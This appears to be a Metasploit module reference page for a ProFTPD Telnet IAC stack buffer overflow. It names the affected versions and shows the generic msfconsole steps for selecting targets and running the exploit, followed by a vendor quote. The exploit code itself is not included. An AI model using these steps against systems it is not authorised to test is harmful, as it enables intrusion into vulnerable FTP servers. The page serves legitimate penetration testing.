This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
BSD
x86
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/freebsd/ftp/proftp_telnet_iac
msf exploit(proftp_telnet_iac) > show targets
...targets...
msf exploit(proftp_telnet_iac) > set TARGET < target-id >
msf exploit(proftp_telnet_iac) > show options
...show and set options...
msf exploit(proftp_telnet_iac) > exploit
Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
– Jim O’Gorman | President, Offensive Security